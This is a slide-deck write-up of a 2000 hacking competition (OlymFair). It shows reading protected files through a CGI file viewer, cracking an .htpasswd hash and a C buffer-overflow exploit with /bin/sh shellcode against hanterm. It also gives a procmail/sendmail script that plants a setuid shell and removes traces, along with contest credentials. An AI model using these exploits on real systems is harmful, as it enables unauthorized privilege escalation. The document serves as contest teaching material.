Download - 1 st OlymFair Workshop Hacking technique
![Page 1: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/1.jpg)
1st OlymFair WorkshopHacking technique
Taeho Oh
http://postech.edu/~ohhara
![Page 2: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/2.jpg)
Contents
• How to pass level 1
• How to pass level 2
• Why did many hackers consume much time in the level 2?
• About level 3
• Conclusion
![Page 3: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/3.jpg)
How to pass level 1 (1)
• What to do?– Execute /cgi-bin/data/idaccess.cgi and get the
way to go to level 2
![Page 4: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/4.jpg)
How to pass level 1 (2)
• Level 1 servers– 203.227.243.161– 203.227.243.162– 203.227.243.163
![Page 5: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/5.jpg)
How to pass level 1 (3)
• 203.227.243.161– OS : Solaris 8– Opened TCP port : 80, 8080
![Page 6: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/6.jpg)
How to pass level 1 (4)
• 203.227.243.162– OS : HPUX 11.0– Opened TCP port : 22, 80, 8080
![Page 7: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/7.jpg)
How to pass level 1 (5)
• 203.227.243.163– OS : MS Windows 2000– Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135,
139, 443, 1025, 1026, 1032, 1723, 3389
![Page 8: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/8.jpg)
How to pass level 1 (6)
• Attack 203.227.243.161– 80 : Apache Web Server– 8080 : Netscape Enterprise Server
• 80 and 8080 web server has same httpd home directory
• Netscape Enterprise Server has a security bug
![Page 9: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/9.jpg)
How to pass level 1 (7)
• Netscape Enterprise Server security bug– I could see files in the specific directory like
below• http://203.227.243.161/?wp-cs-dump
– You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
– I could browse the directories and check the file existence
![Page 10: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/10.jpg)
How to pass level 1 (8)
• The file list/
+----- cgi-bin/
| +----- data/
| +----- hackme/
| +----- a
| +----- a.c
| +----- show_file.html
| +----- showfile.cgi
+----- data/
+----- index.html
Can’t access this directory
![Page 11: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/11.jpg)
How to pass level 1 (9)
• Read .htaccess file with showfile.cgi– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-
bin/data/.htaccess
• Read .htpasswd file from .htaccess with showfile.cgi– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-
bin/data/.htpasswd
![Page 12: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/12.jpg)
How to pass level 1 (10)
• I could crack the encrypted password from .htpasswd with Crack– id:password = admin:banana– I could access /cgi-bin/data directory with this
id and password
![Page 13: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/13.jpg)
How to pass level 1 (11)
• I could get the way to go to level 2– http://203.227.243.161/data/idaccess.html
• This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi
– My serial number• KOR000321-961829513
– My password• oD8YEuqYySWogKSQQsOY00zoAjUkxtv7
![Page 14: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/14.jpg)
How to pass level 1 (12)
• Netscape Enterprise Server directory indexing vulnerability– See
http://www.securityfocus.com/vdb/bottom.html?vid=1063
![Page 15: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/15.jpg)
How to pass level 1 (13)
• Netscape Enterprise Server directory indexing vulnerability patch information
The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.Also, manually editing the file obj.conf will do the same. Conduct a search for the following:Service method="(GET|HEAD)" type="magnus-internal/directory"fn="index-common"and replace fn="index-common" with fn="send-error".
![Page 16: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/16.jpg)
How to pass level 2 (1)
• What to do?– Execute /home/forbidden/pass.cgi
• This executable file owner is root
• This executable file group is wizard
• The permission is 0510
• Need wizard gid to execute /home/forbidden/pass.cgi
![Page 17: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/17.jpg)
How to pass level 2 (2)
• Level 2 server– 203.227.243.164
• 203.227.243.164– OS : Linux– Opened TCP port : 23, 81
![Page 18: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/18.jpg)
How to pass level 2 (3)
• Wizard setuid or setgid files-r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl
-rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
-rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed
-r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq
-r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
-r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm
![Page 19: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/19.jpg)
How to pass level 2 (4)
• Wizard setuid or setgid files ( Cont. )-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl
-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
-rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp
-rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin
-rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
-rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute
-rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
![Page 20: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/20.jpg)
How to pass level 2 (5)
• Attack process
Get wizard euid
Get wizard uid
Create wizard uid, gid file
Get wizard gid
Execute pass.cgi
Get level2 shell
![Page 21: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/21.jpg)
How to pass level 2 (6)
• level2 shell wizard euid– Exploit hanterm bug
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"`
can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
[I have no name!@level2 ... ]$
![Page 22: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/22.jpg)
How to pass level 2 (7)
• level2 shell wizard euid (Cont.)– This is a classical buffer overflow bug– I could get wizard euid shell with 260 buffer
size and -450 offset
![Page 23: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/23.jpg)
How to pass level 2 (8)
• Exploit code
#include<stdio.h>
#include<stdlib.h>
#define OFFSET -450
#define RET_POSITION 260
#define RANGE 20
#define NOP 0x90
char shellcode[1024]=
"\xeb\x1f“ /* jmp 0x1f */
"\x5e“ /* popl %esi */
"\x89\x76\x08“ /* movl %esi,0x8(%esi) */
![Page 24: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/24.jpg)
How to pass level 2 (9)
• Exploit code (Cont.)
"\x31\xc0“ /* xorl %eax,%eax */
"\x88\x46\x07“ /* movb %eax,0x7(%esi) */
"\x89\x46\x0c“ /* movl %eax,0xc(%esi) */
"\xb0\x0b“ /* movb $0xb,%al */
"\x89\xf3“ /* movl %esi,%ebx */
"\x8d\x4e\x08“ /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c“ /* leal 0xc(%esi),%edx */
"\xcd\x80“ /* int $0x80 */
"\x31\xdb“ /* xorl %ebx,%ebx */
"\x89\xd8“ /* movl %ebx,%eax */
![Page 25: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/25.jpg)
How to pass level 2 (10)
• Exploit code (Cont.)
"\x40“ /* inc %eax */
"\xcd\x80“ /* int $0x80 */
"\xe8\xdc\xff\xff\xff“ /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
![Page 26: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/26.jpg)
How to pass level 2 (11)
• Exploit code (Cont.)
char buff[RET_POSITION+RANGE+1],*ptr;
long *addr_ptr,addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
ptr=buff;
![Page 27: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/27.jpg)
How to pass level 2 (12)
• Exploit code (Cont.)
addr_ptr=(long*)ptr;
for(i=0;i<bsize;i+=4)
*(addr_ptr++)=addr;
for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
![Page 28: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/28.jpg)
How to pass level 2 (13)
• Exploit code (Cont.)
execl("/usr/X11R6/bin/hanterm","hanterm",“-hfn",buff,0);
}
![Page 29: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/29.jpg)
How to pass level 2 (14)
• wizard euid wizard uid[I have no name!@level2 ... ]$ cat > a.c
main(){
setreuid(501,501);
execl("/bin/sh","sh",0);
}
[I have no name!@level2 ... ]$ gcc a.c ; ./a.out
[wizard@level2 ... ]$ whoami
wizard
[wizard@level2 ... ]$
![Page 30: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/30.jpg)
How to pass level 2 (15)
• wizard uid create wizard uid, gid file– movemail program is wizard setgid program
• movemail program output file is wizard gid
[wizard@level2 ... ]$ echo haha > test1
[wizard@level2 ... ]$ movemail test1 test2
[wizard@level2 ... ]$ ls –l test1 test2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
[wizard@level2 ... ]$ cat test2
haha
![Page 31: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/31.jpg)
How to pass level 2 (16)
• wizard uid, gid file wizard gid– procmail can execute a arbitrary shell command
with wizard uid, gid when the user can create wizard uid, gid file
![Page 32: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/32.jpg)
How to pass level 2 (17)
• Exploit code#!/bin/sh
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
setreuid(501,501);
setregid(501,501);
execl("/bin/sh","sh",0);
}
EOF
![Page 33: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/33.jpg)
How to pass level 2 (18)
• Exploit code (Cont.)
gcc shh.c -o shh
movemail shh shh2
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
![Page 34: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/34.jpg)
How to pass level 2 (19)
• Exploit code (Cont.)
movemail proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2
![Page 35: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/35.jpg)
How to pass level 2 (20)
• wizard gid execute pass.cgiCongratulation!!
You have passed Level 2.
Your ID : KOR000321-961829513
Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege.And then change the index.htm
l under level3 server.
Level 3 Login ID : level3
Level 4 Login Passwd : olymfair3
![Page 36: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/36.jpg)
Why did many hackers consume much time in the level 2? (1)
• Almost all hackers tried to find a security bug– However, level2 can be cleared with not a bug
but a feature. ( except for hanterm bug )
![Page 37: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/37.jpg)
Why did many hackers consume much time in the level 2? (2)
• /sbin/dump program has a buffer overflow bug and exploit is not released– Many hackers try to exploit this program.
However, the exploit is impossible because main function does not return but exit
![Page 38: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/38.jpg)
Why did many hackers consume much time in the level 2? (3)
• /usr/bin/lprm exploit code generates segmentation fault message– The segmentation fault message is not
generated by /usr/bin/lprm. The message is generated by /usr/bin/lprm exploit code. It’s an exploit code bug.
![Page 39: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/39.jpg)
About level 3
• I consumed much time so I have no time to attack level 3
• I tried to scan level 3 server– However, I can’t find opened TCP port– I didn’t try to attack level 3 from then on
• It seemed to take much time
![Page 40: 1 st OlymFair Workshop Hacking technique](https://reader033.vdocuments.us/reader033/viewer/2022051215/5681499e550346895db6dfac/html5/thumbnails/40.jpg)
Conclusion
• It was an interesting hacking competition